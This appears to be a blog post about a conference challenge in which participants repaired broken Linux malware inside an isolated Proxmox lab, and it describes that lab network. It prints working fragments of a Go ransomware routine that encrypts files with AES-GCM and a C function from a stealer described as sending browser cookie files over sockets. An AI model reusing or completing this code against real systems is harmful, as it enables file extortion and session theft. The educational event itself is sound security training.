argv*mory: a malware forging challenge

posted on : 04/07/2026

if you're just for the link, it's here !!!

the start -

it was a not really sunny day in tpa, fl, when i got the message from cpp swift's president. it was an invite to help with their info sec conference, the Tech Symposium. they were looking for community members who would be willing to help with different aspects, tabling, ctf challenges, organization. my brain started to turn and i knew i wanted to do something really funny. last year in october, i had tabled at the CSUF's OSScon, ran by their security club, OSS. the tabling was fun and i got to present some malware that i was working on for a research project with mitre , which is avalible here. it was cool to get people to mess around with malware when they've never seen it before, but for the tech Symposium, i had a more substantial idea of what i wanted to do.

talking 2 daemons

back to gigas: a while ago, i made a malware titled 'gigas' that was a crappy c# stealer thing that really did not do what i wanted it to. this thing was the first malware i'd ever written in my life, so i'm proud of it for that. however, it started this subconcious idea in my brain of associating malware with demonology, as i'm really into western esotericism, and as malware is seen often as this ephemeral evil in infosec, things fell into place. thus, argv goetia was born as the first instance of this project.

argv goetia was intially meant to be a malware summoning project, where participants would have to fix broken pieces of malware source code ( - this stuck), and the goal was for it to be themed based off of the ars goetia (get it? argv* goetia???). this would have been a really fun way to get people interested (a la vxug).

stupid ashes and the forge

after talking to the organizers of tech Symposium, we were advised to not approach this with doing something in the realm of demons. that was a good call on their part. so me and my compatriot, evan metzinger ( biscottimuncher on most platforms) decided to pivot to the idea of argv*mory, an armory but still using the argv* as a fun little call back to programming. we would keep our malware on linux as that would mean the infra we would set up would be ideally more stable, which is good in my opinion. we decided to focus on two main items:

a stealer
ransomware

granted, i'm not the most elegant programmer in the world and i'm sure as hell still a beginner in this. however, we all have to start somewhere, so these were the points and places in which we chose to start at! evan, my partner in this set up our infrastructure like this:

part une side : evan's infra

Hello, Evan here :) I was the little minion behind infrastructure for this project, I've really been getting into Proxmox administration more seriously this past year and Friday provided me with a great opportunity to push myself.

Power of 5

I am the worlds greatest impulse purchases, a few hundred dollars down, a few weeks of waiting, 5 mini PC's show up to my house wrapped nicely. These machines would become the backbone of this project


	sh
| - UPSTREAM 
	| - OPNSENSE
		| - CISCO 3650
			| - Ida        (PVE1)     (172.X.x.101/24)
			| - Florian    (PVE2)     (172.X.x.102/24)
			| - Gama       (PVE3)     (172.X.x.103/24)
			| - Hildebrand (PVE4)     (172.X.x.104/24)
			| - Hilarion   (PVE5)     (172.X.x.105/24)

This was the general topology for the physical environment, all the machines had a hostname, an IP, and most importantly Proxmox installed. Clustering time!


	| - Castle-Adamant (Cluster)
	| - Ida
	| - Florian
	| - Gama
	| - Hildebrand
	| - Hilarion

All these machines were clusters using IPV4, nothing too fancy. All the physical routing was handled upstream by the OPNSense router, all I needed was 5 hosts and some overhead addressing space.
I also setup a very, poorly inefficient CEPH array (5 x 250GB = 1.25TB/2 -> ~600GB usable), luckily we didn't need thousands of IOPS, a few hundred for less than 5 containers being accessed over SSH through a VDI (guacamole) frontend was no issue for the comical setup. ### SDN
This was my first swing at an SDN ever. After getting the cluster setup I got a VXLAN zone setup between all the machines and added a few vnets.
Why VXLAN instead VXLAN+EVPN, or an even more exotic solution? I wanted to learn how to setup and manage a VXLAN network! VXLAN gave me perfect uptime across all nodes on this small cluster (no flooding). All the nodes were on the same physical network (no need for EVPN). *(vx0N was short hand for VXLAN Vnet N)*



| - Castle-Adamant
	| - SDN
		| - VXLAN
			| - vx01
			| - vx02
			| - vx03
			| - vx0...

All of these Vnets were plumbed into an OPNSense router that I had already configured. This is where I would meet my new favorite tool in OPNSense, Floating rules.

```sh
| - Interfaces
	| - vx01     (192.168.1.X/26)
	| - vx02     (192.168.2.X/26)
	| - vx03     (192.168.3.X/26)
	| - vx0...   (192.168.N.X/26)

I grouped all VXLAN Vnets into a group called "VXLAN_PARTY" (We gotta have some fun). I also made an alias called UPSTREAM that was just the whole addressing block one hop upstream. I started with three floating rules
Every interface got a /26 address space, DHCP handled doling out IP's and DNS for all hosts.




Action Proto SRC   PORT   DST        PORT  DESC
 
X -> IPv4* UPSTREAM    * VXLAN_SUPER   *  Block Upstream traffic into VXLAN_SUPER
X -> IPv4* VXLAN_SUPER * UPSTREAM      *  Block VXLAN -> Upstream
X -> IPv4* VXLAN_SUPER * VXLAN_SUEPR   *  Block inter-VXLAN floater

These were my three running rules to keep ALL traffic contained down stream, to keep upstream from reaching in, and to keep all traffic trapped in its respective VXLAN. There were added rules for passing in and out VNC traffic, but they were nothing special.
I did write some automation for the container creation and enrollment into guacamole based on Cluster node using the proxmox python api (baller), which can be found on the github!
Back to friday :)

the weapons

Gae Bolga

next, the actual malware. i started with the ransomware, which is written in golang for it's speed and because i really enjoy the language. this was a really fun project to get to really learn how to use golang's goroutines and the like. this was a lot of fun, and i ended up using AES-GCM for my encryption.

									
										func cryptfile(f *os.File, key []byte, filebuf []byte) {

	res := make([]byte, len(filebuf))
	block, err := aes.NewCipher(key)
	if err != nil {
		fmt.Println(err)
	}

	gcm, err := cipher.NewGCM(block)
	if err != nil {
		fmt.Println(err)
	}

	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		panic(err.Error())
	}

	res = gcm.Seal(nonce, nonce, filebuf, nil)

	i, err := f.Write(res)

	if err != nil {
		fmt.Println(err)
	}
	fmt.Printf("res : i is %x\n", i)

}

func decryptfile(f *os.File, key []byte, filebuf []byte) {

	res := make([]byte, len(filebuf))

	block, err := aes.NewCipher(key)
	if err != nil {
		fmt.Println(err)
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		fmt.Println(err)
	}

	ns := gcm.NonceSize()
	res, err = gcm.Open(nil, filebuf[:ns], filebuf[ns:], nil)

	i, err := f.Write(res)

	if err != nil {
		fmt.Println(err)
	}
	fmt.Printf(" res : i is %x\n", i)

}

these functions to intake files and encrypt them + the decryption functions were called with goroutines and 10 channels for it. this, once i was finished with testing, worked well enough to target the home directory and it ended up being a really interesting proof of concept to get it working. this was named Gae Bulga, after the spear.
learning to use goroutines is esepecialyl really interesting because of how useful they were for me to use, as well as getting some experience with semaphores. setting this up was done like this:


											if *dc {
				sem <- struct{}{}

				wg.Add(1)
				go func() {
					defer wg.Done()
					defer target.Close()
					fmt.Printf("decrypting!\n")
					defer func() { <-sem }()
					decryptfile(target, key, filebuf)
				}()
			}

		}

i'm not sure if this is the most efficient way to do this type of ransomware operation, but this is what worked for me and made it run decently fast. the key provided was a dummy key, which could've been edited or changed to use a randomly generated key. this proof of concept worked well especially when pointed at the user's home directory.

Muramasa

the second one, the stealer, was far more complicated. this was written in C, and this required there to be both a client and a stealer to actually move the files from point to point. using raw sockets to do this was really interesting, as again, i've not worked with them. the way this one was formatted was a little more focused as well, as i created lists of locations and files inside of linux machines in where most browser cookies are stored. this would then iterate through the folders, and grab them off of there, using the sockets to send over each file.


int sendfileWr(char filename[], char fstd[]) {


    uint32_t namelen = htonl(strlen(fstd));
    printf("sending %s\n", fstd);
    send(client_fd, &namelen, sizeof(namelen), 0);
    send(client_fd, fstd, strlen(fstd), 0);

    printf("network time!\n");

    FILE* fp = fopen(filename, "r");
    printf("at file opeen!\n");

    if (fp == NULL) {
        perror("fopen");
        return 1;
    }
    int fpd = fileno(fp);
    printf("at fileno!\n");

    if (fpd == -1){
        perror("failed 3");
        return 1;
    }

    struct stat fs;
    printf("at fstat!\n");

    if (fstat(fpd, &fs) <0){
        perror("failed 2");
        return 1;
    }
    uint32_t fsz = (uint32_t)fs.st_size;
    printf("at fsz!\n");

    uint32_t cfsz = htonl(fsz);
    printf("at cfsz!\n");


    int len = send(client_fd, &cfsz, sizeof(cfsz), 0);

    printf("at len!\n");

    if (len <0 ){
        perror("failed 1");
    }

    off_t offs = 0;
    off_t rm = fsz;
    ssize_t sent = 0;
    printf("at size!\n");


    while (rm > 0) {
        sent = sendfile(client_fd, fpd, &offs, rm);
        printf("at send!\n");

        if (sent <= 0) {
            if (errno == EAGAIN || errno == EINTR)
                continue;
            perror("sendfile");
            break;
        }
        rm -= sent;
    }


    fclose(fp);



    return 0;


}

this was named muramusa and worked really well. if i were to approach this one again, i would def do this in golang which makes this process so much faster.

part deux side episode : the ctfs

additionally, tech Symposium was also hosting a ctf. i asked if i could make some pwn ctf challs for this, and they said yes! those were:

kitten heel
stiletto
espardille

there were really fun! happy hacking them!

getting results

at this point, we've talked all about the what and the why, but let's talk about the results and how this went. to summarize, not everyone was willing to sit down for 3 hours and try to code this in the middle of the conference. we have one person who managed to sit down and get it to compile, which made this guy our winner. that was really cool. we had some sick prizes to give away as well, including a golden thinkpad.

next year, assuming i'm in town and able to do this, i would do a few things differently. instead of having it be something you have to fix, i would rather have it be a situation in which you get to run malware and try to figure out what it's doing and how to fix it. this i think would be way more fun and interesting to let people see how malware works as not everyone wants to fix broken c socket code. lit! thank you for listening.

goho-m